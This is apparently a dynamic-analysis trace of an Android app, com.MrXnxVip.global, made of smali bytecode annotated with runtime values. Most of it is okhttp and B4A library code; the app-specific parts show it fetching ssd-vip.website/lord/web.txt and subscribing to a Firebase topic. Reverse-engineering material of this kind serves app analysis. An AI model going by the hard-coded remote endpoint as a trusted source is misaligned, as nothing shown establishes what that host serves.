                        50if-eq p0, v2, :cond_71
                        51iget p0, p1, Lanywheresoftware/b4a/objects/ServiceHelper;->AutomaticForegroundMode:I
                        52const/4 v2, 0x3
                        53if-eq p0, v2, :cond_53
                        54iget p0, p1, Lanywheresoftware/b4a/objects/ServiceHelper;->AutomaticForegroundMode:I
                        55const/4 v2, 0x2
                        56if-ne p0, v2, :cond_71
                        57if-eqz v1, :cond_71
                        58cond_53:
                        59iget-object p0, p1, Lanywheresoftware/b4a/objects/ServiceHelper;->AutomaticForegroundNotification:Landroid/app/Notification;
                        60if-nez p0, :cond_5d
                        62invoke-static {p1, p2}, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->createAutoNotification(Lanywheresoftware/b4a/objects/ServiceHelper;Lanywheresoftware/b4a/BA;)Landroid/app/Notification;
                        63move-result-object p0
                        64iput-object p0, p1, Lanywheresoftware/b4a/objects/ServiceHelper;->AutomaticForegroundNotification:Landroid/app/Notification;
                        65cond_5d: const p0, 0xc762
                        66iput p0, p1, Lanywheresoftware/b4a/objects/ServiceHelper;->autoNotificationId:I
                        67try_start_62: iget p0, p1, Lanywheresoftware/b4a/objects/ServiceHelper;->autoNotificationId:I
                        69iget-object p2, p1, Lanywheresoftware/b4a/objects/ServiceHelper;->AutomaticForegroundNotification:Landroid/app/Notification;
                        71invoke-virtual {p1, p0, p2}, Lanywheresoftware/b4a/objects/ServiceHelper;->StartForeground(ILandroid/app/Notification;)V
                        72try_end_69: goto/16 :goto_71
                        73catch_6a: move-exception p0
                        74new-instance p1, Ljava/lang/RuntimeException;
                        76invoke-direct {p1, p0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        77throw p1
                        78cond_71: return-object v0
                        Cross References
                        APIs
                        • java.util.List.clear
                        • java.util.List.addAll
                        Strings
                        • java.lang.String@b8d1c0f
                        • ssd-vip.website
                        Position Instruction Meta Information
                        0new-instance v0, Lokhttp3/HttpUrl$Builder;
                        2invoke-direct {v0}, Lokhttp3/HttpUrl$Builder;-><init>()V
                        4iget-object v1, p0, Lokhttp3/HttpUrl;->scheme:Ljava/lang/String;
                        6invoke-virtual {v0, v1}, Lokhttp3/HttpUrl$Builder;->setScheme$okhttp(Ljava/lang/String;)V
                        • Time: 697401
                          • This:
                            • https:///
                          • p0: java.lang.String@b8d1c0f
                        8invoke-virtual {p0}, Lokhttp3/HttpUrl;->encodedUsername()Ljava/lang/String;
                        9move-result-object v1
                        11invoke-virtual {v0, v1}, Lokhttp3/HttpUrl$Builder;->setEncodedUsername$okhttp(Ljava/lang/String;)V
                        • Time: 697423
                          • This:
                            • https:///
                          • p0: ""
                        13invoke-virtual {p0}, Lokhttp3/HttpUrl;->encodedPassword()Ljava/lang/String;
                        14move-result-object v1
                        16invoke-virtual {v0, v1}, Lokhttp3/HttpUrl$Builder;->setEncodedPassword$okhttp(Ljava/lang/String;)V
                        • Time: 697429
                          • This:
                            • https:///
                          • p0: ""
                        18iget-object v1, p0, Lokhttp3/HttpUrl;->host:Ljava/lang/String;
                        20invoke-virtual {v0, v1}, Lokhttp3/HttpUrl$Builder;->setHost$okhttp(Ljava/lang/String;)V
                        • Time: 697433
                          • This:
                            • https:///
                          • p0: ssd-vip.website
                        21iget v1, p0, Lokhttp3/HttpUrl;->port:I
                        23sget-object v2, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        25iget-object v3, p0, Lokhttp3/HttpUrl;->scheme:Ljava/lang/String;
                        27invoke-virtual {v2, v3}, Lokhttp3/HttpUrl$Companion;->defaultPort(Ljava/lang/String;)I
                        28move-result v2
                        29if-eq v1, v2, :cond_2c
                        30iget v1, p0, Lokhttp3/HttpUrl;->port:I
                        31goto/16 :goto_2d
                        32cond_2c: const/4 v1, -0x1
                        33goto_2d:
                        34invoke-virtual {v0, v1}, Lokhttp3/HttpUrl$Builder;->setPort$okhttp(I)V
                        36invoke-virtual {v0}, Lokhttp3/HttpUrl$Builder;->getEncodedPathSegments$okhttp()Ljava/util/List;
                        37move-result-object v1
                        39invoke-interface {v1}, Ljava/util/List;->clear()V
                        41invoke-virtual {v0}, Lokhttp3/HttpUrl$Builder;->getEncodedPathSegments$okhttp()Ljava/util/List;
                        42move-result-object v1
                        44invoke-virtual {p0}, Lokhttp3/HttpUrl;->encodedPathSegments()Ljava/util/List;
                        45move-result-object v2
                        46check-cast v2, Ljava/util/Collection;
                        48invoke-interface {v1, v2}, Ljava/util/List;->addAll(Ljava/util/Collection;)Z
                        50invoke-virtual {p0}, Lokhttp3/HttpUrl;->encodedQuery()Ljava/lang/String;
                        • Time: 697435
                          • This:
                            • https://ssd-vip.website/lord/web.txt
                          • Return:
                            • null
                        51move-result-object v1
                        53invoke-virtual {v0, v1}, Lokhttp3/HttpUrl$Builder;->encodedQuery(Ljava/lang/String;)Lokhttp3/HttpUrl$Builder;
                        55invoke-virtual {p0}, Lokhttp3/HttpUrl;->encodedFragment()Ljava/lang/String;
                        • Time: 697440
                          • This:
                            • https://ssd-vip.website/lord/web.txt
                          • Return:
                            • null
                        56move-result-object v1
                        58invoke-virtual {v0, v1}, Lokhttp3/HttpUrl$Builder;->setEncodedFragment$okhttp(Ljava/lang/String;)V
                        • Time: 697441
                          • This:
                            • https:///
                          • p0: null
                        59return-object v0
                        Cross References
                        APIs
                        • java.lang.String.equals
                        • java.io.File.<init>
                        • java.io.File.exists
                        • java.io.File.<init>
                        • java.io.File.exists
                        • android.app.Application.getAssets
                        • android.content.res.AssetManager.list
                        • java.util.Arrays.asList
                        • java.lang.String.toLowerCase
                        • java.util.List.indexOf
                        Strings
                        • AssetsDir
                        • /data/user/0/com.MrXnxVip.global/files
                        • offlinemode.txt
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        6const-string v0, "AssetsDir"
                        8invoke-virtual {p0, v0}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        9move-result v0
                        10if-nez v0, :cond_12
                        11new-instance v0, Ljava/io/File;
                        13invoke-direct {v0, p0, p1}, Ljava/io/File;-><init>(Ljava/lang/String;Ljava/lang/String;)V
                        • Time: 820065
                          • This:
                            • /data/user/0/com.MrXnxVip.global/files/offlinemode.txt
                          • p0: /data/user/0/com.MrXnxVip.global/files
                          • p1: offlinemode.txt
                          • Return:
                            • /data/user/0/com.MrXnxVip.global/files/offlinemode.txt
                        15invoke-virtual {v0}, Ljava/io/File;->exists()Z
                        • Time: 689632
                          • This:
                            • /data/user/0/com.MrXnxVip.global/files/NULL.txt
                          • Return:
                            • false
                        • Time: 695948
                          • This:
                            • /data/user/0/com.MrXnxVip.global/files/NULL.txt
                          • Return:
                            • true
                        16move-result p0
                        17return p0
                        18cond_12:
                        19sget-object p0, Lanywheresoftware/b4a/objects/streams/File;->virtualAssetsFolder:Ljava/lang/String;
                        20if-eqz p0, :cond_22
                        21new-instance p0, Ljava/io/File;
                        23sget-object v0, Lanywheresoftware/b4a/objects/streams/File;->virtualAssetsFolder:Ljava/lang/String;
                        25invoke-direct {p0, v0, p1}, Ljava/io/File;-><init>(Ljava/lang/String;Ljava/lang/String;)V
                        27invoke-virtual {p0}, Ljava/io/File;->exists()Z
                        28move-result p0
                        29return p0
                        30cond_22:
                        31sget-object p0, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        33invoke-virtual {p0}, Landroid/app/Application;->getAssets()Landroid/content/res/AssetManager;
                        34move-result-object p0
                        36const-string v0, ""
                        38invoke-virtual {p0, v0}, Landroid/content/res/AssetManager;->list(Ljava/lang/String;)[Ljava/lang/String;
                        39move-result-object p0
                        41invoke-static {p0}, Ljava/util/Arrays;->asList([Ljava/lang/Object;)Ljava/util/List;
                        42move-result-object p0
                        44sget-object v0, Lanywheresoftware/b4a/BA;->cul:Ljava/util/Locale;
                        46invoke-virtual {p1, v0}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
                        47move-result-object p1
                        49invoke-interface {p0, p1}, Ljava/util/List;->indexOf(Ljava/lang/Object;)I
                        50move-result p0
                        51const/4 p1, -0x1
                        52if-le p0, p1, :cond_41
                        53const/4 p0, 0x1
                        54return p0
                        55cond_41: const/4 p0, 0x0
                        56return p0
                        Cross References
                        APIs
                        • java.util.List.size
                        • java.util.List.get
                        • java.util.List.set
                        • java.util.List.size
                        • java.util.List.get
                        • java.util.List.set
                        Strings
                        • [\"<>^`{|}]
                        • ["<>^`{|}]
                        • []
                        • \\^`{|}
                        • \"#<>\\^`{|}
                        Position Instruction Meta Information
                        0move-object/from16 v0, p0
                        1check-cast v0, Lokhttp3/HttpUrl$Builder;
                        3iget-object v1, v0, Lokhttp3/HttpUrl$Builder;->host:Ljava/lang/String;
                        4const/4 v2, 0x0
                        5if-eqz v1, :cond_19
                        6check-cast v1, Ljava/lang/CharSequence;
                        7new-instance v3, Lkotlin/text/Regex;
                        9const-string v4, "[\"<>^`{|}]"
                        11invoke-direct {v3, v4}, Lkotlin/text/Regex;-><init>(Ljava/lang/String;)V
                        • Time: 697443
                          • p0: ["<>^`{|}]
                          • Return:
                            • ["<>^`{|}]
                        13const-string v4, ""
                        15invoke-virtual {v3, v1, v4}, Lkotlin/text/Regex;->replace(Ljava/lang/CharSequence;Ljava/lang/String;)Ljava/lang/String;
                        16move-result-object v1
                        17goto/16 :goto_1a
                        18cond_19: move-object v1, v2
                        19goto_1a: iput-object v1, v0, Lokhttp3/HttpUrl$Builder;->host:Ljava/lang/String;
                        21iget-object v1, v0, Lokhttp3/HttpUrl$Builder;->encodedPathSegments:Ljava/util/List;
                        23invoke-interface {v1}, Ljava/util/List;->size()I
                        24move-result v1
                        25const/4 v3, 0x0
                        26const/4 v4, 0x0
                        27goto_24: if-ge v4, v1, :cond_49
                        29iget-object v5, v0, Lokhttp3/HttpUrl$Builder;->encodedPathSegments:Ljava/util/List;
                        31sget-object v6, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        33iget-object v7, v0, Lokhttp3/HttpUrl$Builder;->encodedPathSegments:Ljava/util/List;
                        35invoke-interface {v7, v4}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        36move-result-object v7
                        37check-cast v7, Ljava/lang/String;
                        38const/4 v8, 0x0
                        39const/4 v9, 0x0
                        40const/4 v11, 0x1
                        41const/4 v12, 0x1
                        42const/4 v13, 0x0
                        43const/4 v14, 0x0
                        44const/4 v15, 0x0
                        45const/16 v16, 0xe3
                        46const/16 v17, 0x0
                        48const-string v10, "[]"
                        50invoke-static/range {v6 .. v17}, Lokhttp3/HttpUrl$Companion;->canonicalize$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IILjava/lang/String;ZZZZLjava/nio/charset/Charset;ILjava/lang/Object;)Ljava/lang/String;
                        51move-result-object v6
                        53invoke-interface {v5, v4, v6}, Ljava/util/List;->set(ILjava/lang/Object;)Ljava/lang/Object;
                        54add-int/lit8 v4, v4, 0x1
                        55goto/16 :goto_24
                        56cond_49:
                        57iget-object v1, v0, Lokhttp3/HttpUrl$Builder;->encodedQueryNamesAndValues:Ljava/util/List;
                        58if-eqz v1, :cond_77
                        60invoke-interface {v1}, Ljava/util/List;->size()I
                        61move-result v4
                        62goto_51: if-ge v3, v4, :cond_77
                        64invoke-interface {v1, v3}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        65move-result-object v5
                        66move-object v7, v5
                        67check-cast v7, Ljava/lang/String;
                        68if-eqz v7, :cond_70
                        70sget-object v6, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        71const/4 v8, 0x0
                        72const/4 v9, 0x0
                        73const/4 v11, 0x1
                        74const/4 v12, 0x1
                        75const/4 v13, 0x1
                        76const/4 v14, 0x0
                        77const/4 v15, 0x0
                        78const/16 v16, 0xc3
                        79const/16 v17, 0x0
                        81const-string v10, "\\^`{|}"
                        83invoke-static/range {v6 .. v17}, Lokhttp3/HttpUrl$Companion;->canonicalize$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IILjava/lang/String;ZZZZLjava/nio/charset/Charset;ILjava/lang/Object;)Ljava/lang/String;
                        84move-result-object v5
                        85goto/16 :goto_71
                        86cond_70: move-object v5, v2
                        87goto_71:
                        88invoke-interface {v1, v3, v5}, Ljava/util/List;->set(ILjava/lang/Object;)Ljava/lang/Object;
                        89add-int/lit8 v3, v3, 0x1
                        90goto/16 :goto_51
                        91cond_77:
                        92iget-object v6, v0, Lokhttp3/HttpUrl$Builder;->encodedFragment:Ljava/lang/String;
                        93if-eqz v6, :cond_8e
                        95sget-object v5, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        96const/4 v7, 0x0
                        97const/4 v8, 0x0
                        98const/4 v10, 0x1
                        99const/4 v11, 0x1
                        100const/4 v12, 0x0
                        101const/4 v13, 0x1
                        102const/4 v14, 0x0
                        103const/16 v15, 0xa3
                        104const/16 v16, 0x0
                        106const-string v9, " \"#<>\\^`{|}"
                        108invoke-static/range {v5 .. v16}, Lokhttp3/HttpUrl$Companion;->canonicalize$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IILjava/lang/String;ZZZZLjava/nio/charset/Charset;ILjava/lang/Object;)Ljava/lang/String;
                        109move-result-object v2
                        110cond_8e: iput-object v2, v0, Lokhttp3/HttpUrl$Builder;->encodedFragment:Ljava/lang/String;
                        111return-object v0
                        APIs
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvvv4:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • AssetsDir
                        • port.txt
                        • java.lang.String@7ef5a0b
                        • java.lang.String@8699c91
                        • lord
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        5new-instance v0, Lanywheresoftware/b4a/objects/collections/List;
                        7invoke-direct {v0}, Lanywheresoftware/b4a/objects/collections/List;-><init>()V
                        9sget-object v0, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        11sget-object v0, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        13invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirAssets()Ljava/lang/String;
                        • Time: 695468
                          • Return:
                            • AssetsDir
                        14move-result-object v0
                        16const-string v1, "port.txt"
                        18invoke-static {v0, v1}, Lanywheresoftware/b4a/objects/streams/File;->ReadList(Ljava/lang/String;Ljava/lang/String;)Lanywheresoftware/b4a/objects/collections/List;
                        19move-result-object v0
                        21sget-object v1, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvvv4:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper;
                        22new-instance v2, Ljava/lang/StringBuilder;
                        24invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        26const-string v3, ""
                        28invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        29const/4 v4, 0x0
                        31invoke-virtual {v0, v4}, Lanywheresoftware/b4a/objects/collections/List;->Get(I)Ljava/lang/Object;
                        32move-result-object v0
                        34invoke-static {v0}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        35move-result-object v0
                        37invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        39invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        41invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        42move-result-object v0
                        44invoke-virtual {v1, v0}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper;->SubscribeToTopic(Ljava/lang/String;)V
                        • Time: 695500
                          • This:
                            • com.google.firebase.messaging.FirebaseMessaging@462088a
                          • Return:
                            • java.lang.Class@2d7327f
                            • getName: com.google.firebase.messaging.FirebaseMessaging
                        • Time: 695501
                          • This:
                            • (FirebaseMessaging) com.google.firebase.messaging.FirebaseMessaging@462088a
                          • Return:
                            • java.lang.String@7ef5a0b
                        • Time: 695499
                          • This:
                            • (FirebaseMessaging) com.google.firebase.messaging.FirebaseMessaging@462088a
                          • p0: lord
                        • Time: 824894
                          • This:
                            • com.google.firebase.messaging.FirebaseMessaging@13f248d
                          • Return:
                            • java.lang.Class@680279e
                            • getName: com.google.firebase.messaging.FirebaseMessaging
                        • Time: 824895
                          • This:
                            • anywheresoftware.b4a.objects.FirebaseNotificationsService$FirebaseMessageWrapper@3a486b8
                          • Return:
                            • java.lang.String@8699c91
                        45return-object v3
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        • okhttp3.internal.proxy.NullProxySelector.INSTANCE:Lokhttp3/internal/proxy/NullProxySelector
                        • java.net.ProxySelector.getDefault
                        • okhttp3.internal.proxy.NullProxySelector.INSTANCE:Lokhttp3/internal/proxy/NullProxySelector
                        • java.util.Collection.isEmpty
                        • java.lang.Iterable.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        Strings
                        • builder
                        Position Instruction Meta Information
                        1const-string v0, "builder"
                        3invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        5invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        7invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getDispatcher$okhttp()Lokhttp3/Dispatcher;
                        8move-result-object v0
                        9iput-object v0, p0, Lokhttp3/OkHttpClient;->dispatcher:Lokhttp3/Dispatcher;
                        11invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getConnectionPool$okhttp()Lokhttp3/ConnectionPool;
                        12move-result-object v0
                        13iput-object v0, p0, Lokhttp3/OkHttpClient;->connectionPool:Lokhttp3/ConnectionPool;
                        15invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getInterceptors$okhttp()Ljava/util/List;
                        16move-result-object v0
                        18invoke-static {v0}, Lokhttp3/internal/Util;->toImmutableList(Ljava/util/List;)Ljava/util/List;
                        19move-result-object v0
                        20iput-object v0, p0, Lokhttp3/OkHttpClient;->interceptors:Ljava/util/List;
                        22invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getNetworkInterceptors$okhttp()Ljava/util/List;
                        23move-result-object v0
                        25invoke-static {v0}, Lokhttp3/internal/Util;->toImmutableList(Ljava/util/List;)Ljava/util/List;
                        26move-result-object v0
                        27iput-object v0, p0, Lokhttp3/OkHttpClient;->networkInterceptors:Ljava/util/List;
                        29invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getEventListenerFactory$okhttp()Lokhttp3/EventListener$Factory;
                        30move-result-object v0
                        31iput-object v0, p0, Lokhttp3/OkHttpClient;->eventListenerFactory:Lokhttp3/EventListener$Factory;
                        33invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getRetryOnConnectionFailure$okhttp()Z
                        • Time: 697082
                          • This:
                            • okhttp3.OkHttpClient$Builder@3b3a382
                          • Return:
                            • true
                        34move-result v0
                        35iput-boolean v0, p0, Lokhttp3/OkHttpClient;->retryOnConnectionFailure:Z
                        37invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getAuthenticator$okhttp()Lokhttp3/Authenticator;
                        38move-result-object v0
                        39iput-object v0, p0, Lokhttp3/OkHttpClient;->authenticator:Lokhttp3/Authenticator;
                        41invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getFollowRedirects$okhttp()Z
                        • Time: 697084
                          • This:
                            • okhttp3.OkHttpClient$Builder@3b3a382
                          • Return:
                            • true
                        42move-result v0
                        43iput-boolean v0, p0, Lokhttp3/OkHttpClient;->followRedirects:Z
                        45invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getFollowSslRedirects$okhttp()Z
                        • Time: 697085
                          • This:
                            • okhttp3.OkHttpClient$Builder@3b3a382
                          • Return:
                            • true
                        46move-result v0
                        47iput-boolean v0, p0, Lokhttp3/OkHttpClient;->followSslRedirects:Z
                        49invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getCookieJar$okhttp()Lokhttp3/CookieJar;
                        50move-result-object v0
                        51iput-object v0, p0, Lokhttp3/OkHttpClient;->cookieJar:Lokhttp3/CookieJar;
                        53invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getCache$okhttp()Lokhttp3/Cache;
                        54move-result-object v0
                        55iput-object v0, p0, Lokhttp3/OkHttpClient;->cache:Lokhttp3/Cache;
                        57invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getDns$okhttp()Lokhttp3/Dns;
                        58move-result-object v0
                        59iput-object v0, p0, Lokhttp3/OkHttpClient;->dns:Lokhttp3/Dns;
                        61invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getProxy$okhttp()Ljava/net/Proxy;
                        62move-result-object v0
                        63iput-object v0, p0, Lokhttp3/OkHttpClient;->proxy:Ljava/net/Proxy;
                        65invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getProxy$okhttp()Ljava/net/Proxy;
                        66move-result-object v0
                        67if-eqz v0, :cond_69
                        69sget-object v0, Lokhttp3/internal/proxy/NullProxySelector;->INSTANCE:Lokhttp3/internal/proxy/NullProxySelector;
                        70check-cast v0, Ljava/net/ProxySelector;
                        71goto/16 :goto_7b
                        72cond_69:
                        73invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getProxySelector$okhttp()Ljava/net/ProxySelector;
                        74move-result-object v0
                        75if-eqz v0, :cond_70
                        76goto/16 :goto_74
                        77cond_70:
                        78invoke-static {}, Ljava/net/ProxySelector;->getDefault()Ljava/net/ProxySelector;
                        79move-result-object v0
                        80goto_74: if-eqz v0, :cond_77
                        81goto/16 :goto_7b
                        82cond_77:
                        83sget-object v0, Lokhttp3/internal/proxy/NullProxySelector;->INSTANCE:Lokhttp3/internal/proxy/NullProxySelector;
                        84check-cast v0, Ljava/net/ProxySelector;
                        85goto_7b: iput-object v0, p0, Lokhttp3/OkHttpClient;->proxySelector:Ljava/net/ProxySelector;
                        87invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getProxyAuthenticator$okhttp()Lokhttp3/Authenticator;
                        88move-result-object v0
                        89iput-object v0, p0, Lokhttp3/OkHttpClient;->proxyAuthenticator:Lokhttp3/Authenticator;
                        91invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getSocketFactory$okhttp()Ljavax/net/SocketFactory;
                        92move-result-object v0
                        93iput-object v0, p0, Lokhttp3/OkHttpClient;->socketFactory:Ljavax/net/SocketFactory;
                        95invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getConnectionSpecs$okhttp()Ljava/util/List;
                        96move-result-object v0
                        97iput-object v0, p0, Lokhttp3/OkHttpClient;->connectionSpecs:Ljava/util/List;
                        99invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getProtocols$okhttp()Ljava/util/List;
                        100move-result-object v0
                        101iput-object v0, p0, Lokhttp3/OkHttpClient;->protocols:Ljava/util/List;
                        103invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getHostnameVerifier$okhttp()Ljavax/net/ssl/HostnameVerifier;
                        104move-result-object v0
                        105iput-object v0, p0, Lokhttp3/OkHttpClient;->hostnameVerifier:Ljavax/net/ssl/HostnameVerifier;
                        107invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getCallTimeout$okhttp()I
                        108move-result v0
                        109iput v0, p0, Lokhttp3/OkHttpClient;->callTimeoutMillis:I
                        111invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getConnectTimeout$okhttp()I
                        112move-result v0
                        113iput v0, p0, Lokhttp3/OkHttpClient;->connectTimeoutMillis:I
                        115invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getReadTimeout$okhttp()I
                        116move-result v0
                        117iput v0, p0, Lokhttp3/OkHttpClient;->readTimeoutMillis:I
                        119invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getWriteTimeout$okhttp()I
                        120move-result v0
                        121iput v0, p0, Lokhttp3/OkHttpClient;->writeTimeoutMillis:I
                        123invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getPingInterval$okhttp()I
                        124move-result v0
                        125iput v0, p0, Lokhttp3/OkHttpClient;->pingIntervalMillis:I
                        127invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getMinWebSocketMessageToCompress$okhttp()J
                        128move-result-wide v0
                        129iput-wide v0, p0, Lokhttp3/OkHttpClient;->minWebSocketMessageToCompress:J
                        131invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getRouteDatabase$okhttp()Lokhttp3/internal/connection/RouteDatabase;
                        132move-result-object v0
                        133if-eqz v0, :cond_c6
                        134goto/16 :goto_cb
                        135cond_c6: new-instance v0, Lokhttp3/internal/connection/RouteDatabase;
                        137invoke-direct {v0}, Lokhttp3/internal/connection/RouteDatabase;-><init>()V
                        138goto_cb: iput-object v0, p0, Lokhttp3/OkHttpClient;->routeDatabase:Lokhttp3/internal/connection/RouteDatabase;
                        140iget-object v0, p0, Lokhttp3/OkHttpClient;->connectionSpecs:Ljava/util/List;
                        141check-cast v0, Ljava/lang/Iterable;
                        142instance-of v1, v0, Ljava/util/Collection;
                        143const/4 v2, 0x1
                        144if-eqz v1, :cond_e0
                        145move-object v1, v0
                        146check-cast v1, Ljava/util/Collection;
                        148invoke-interface {v1}, Ljava/util/Collection;->isEmpty()Z
                        149move-result v1
                        150if-eqz v1, :cond_e0
                        151goto/16 :goto_f7
                        152cond_e0:
                        153invoke-interface {v0}, Ljava/lang/Iterable;->iterator()Ljava/util/Iterator;
                        154move-result-object v0
                        155cond_e4:
                        156invoke-interface {v0}, Ljava/util/Iterator;->hasNext()Z
                        157move-result v1
                        158if-eqz v1, :cond_f7
                        160invoke-interface {v0}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        161move-result-object v1
                        162check-cast v1, Lokhttp3/ConnectionSpec;
                        164invoke-virtual {v1}, Lokhttp3/ConnectionSpec;->isTls()Z
                        • Time: 697089
                          • This:
                            • ConnectionSpec(cipherSuites=[TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256, TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256, TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256, TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256, TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA, TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA, TLS_RSA_WITH_AES_128_GCM_SHA256, TLS_RSA_WITH_AES_256_GCM_SHA384, TLS_RSA_WITH_AES_128_CBC_SHA, TLS_RSA_WITH_AES_256_CBC_SHA, SSL_RSA_WITH_3DES_EDE_CBC_SHA], tlsVersions=[TLS_1_3, TLS_1_2], supportsTlsExtensions=true)
                          • Return:
                            • true
                        165move-result v1
                        166if-eqz v1, :cond_e4
                        167const/4 v2, 0x0
                        168goto_f7: if-eqz v2, :cond_10d
                        169const/4 p1, 0x0
                        170move-object v0, p1
                        171check-cast v0, Ljavax/net/ssl/SSLSocketFactory;
                        172iput-object v0, p0, Lokhttp3/OkHttpClient;->sslSocketFactoryOrNull:Ljavax/net/ssl/SSLSocketFactory;
                        173move-object v0, p1
                        174check-cast v0, Lokhttp3/internal/tls/CertificateChainCleaner;
                        175iput-object v0, p0, Lokhttp3/OkHttpClient;->certificateChainCleaner:Lokhttp3/internal/tls/CertificateChainCleaner;
                        176check-cast p1, Ljavax/net/ssl/X509TrustManager;
                        177iput-object p1, p0, Lokhttp3/OkHttpClient;->x509TrustManager:Ljavax/net/ssl/X509TrustManager;
                        179sget-object p1, Lokhttp3/CertificatePinner;->DEFAULT:Lokhttp3/CertificatePinner;
                        180iput-object p1, p0, Lokhttp3/OkHttpClient;->certificatePinner:Lokhttp3/CertificatePinner;
                        181goto/16 :goto_174
                        182cond_10d:
                        183invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getSslSocketFactoryOrNull$okhttp()Ljavax/net/ssl/SSLSocketFactory;
                        184move-result-object v0
                        185if-eqz v0, :cond_13b
                        187invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getSslSocketFactoryOrNull$okhttp()Ljavax/net/ssl/SSLSocketFactory;
                        188move-result-object v0
                        189iput-object v0, p0, Lokhttp3/OkHttpClient;->sslSocketFactoryOrNull:Ljavax/net/ssl/SSLSocketFactory;
                        191invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getCertificateChainCleaner$okhttp()Lokhttp3/internal/tls/CertificateChainCleaner;
                        192move-result-object v0
                        194invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        195iput-object v0, p0, Lokhttp3/OkHttpClient;->certificateChainCleaner:Lokhttp3/internal/tls/CertificateChainCleaner;
